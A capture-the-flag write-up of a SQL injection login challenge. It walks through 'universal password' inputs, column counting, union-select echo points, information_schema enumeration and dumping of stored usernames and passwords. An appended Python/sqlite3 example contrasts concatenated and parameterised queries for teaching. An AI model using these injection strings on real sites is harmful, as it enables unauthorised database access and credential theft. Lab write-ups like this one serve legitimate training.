Challenge
Open the page and it will show as follows
Check the source code and find a check.php that takes its parameters via GET.
Try entering an account name and password.
The challenge is about SQL, so use a universal password:
1'or 1=1#
or
admin' or '1'='1'
I was given a garbled code, but it’s not a flag.
Find the number of fields
/check.php?username=admin' order by 3%23&password=1
An error is reported at 4, indicating that the number of fields is 3
Use a union query to test the injection point and find the echo points
Construct the payload
/check.php?username=1' union select 1,2,3%23&password=1
The echo points are 2 and 3
View the database
/check.php?username=1' union select 1,database(),version()%23&password=1
The database name is geek
View the tables
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
Two tables are returned
View the fields in the table
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
The fields are all the same
View data in the table
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
The data in the geekuser table is
The data in the l0ve1ysq1 table is
The output is cut off on the page; view the page source to see all of it.
Summary
Use a union query to test the injection point and find the echo points
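Why the inputs above change the query, and what stops them, as an added example (not part of the original write-up, and not the challenge's check.php, whose code the page does not show). It is a Python/sqlite3 model that assumes the login concatenates its parameters into a query over a three-column table; the row data is constructed, and `#` is replaced by SQLite's `--` comment.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the challenge's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE geekuser (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO geekuser VALUES (1, 'admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    # Vulnerable pattern (assumed): parameters are pasted into the SQL text, so a
    # quote in `username` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, username, password FROM geekuser "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchall()

def login_bound(db, username, password):
    # Hardened pattern: placeholders keep the parameters as data, so the query
    # shape (one SELECT, three columns, two comparisons) cannot change.
    sql = ("SELECT id, username, password FROM geekuser "
           "WHERE username=? AND password=?")
    return db.execute(sql, (username, password)).fetchall()

# Inputs modelled on the walkthrough, with '#' swapped for SQLite's '--' comment.
UNIVERSAL = "1' or 1=1 --"
UNION = "1' union select 1,2,3 --"

def compare(username, password="1"):
    # Run the same input through both query styles against a fresh database.
    db = make_db()
    return login_concat(db, username, password), login_bound(db, username, password)

if __name__ == "__main__":
    for payload in (UNIVERSAL, UNION):
        vulnerable, hardened = compare(payload)
        print(f"{payload!r}: concat={vulnerable} bound={hardened}")
```

With bound parameters both inputs are compared as literal usernames and match no row, while a correct username and password still log in.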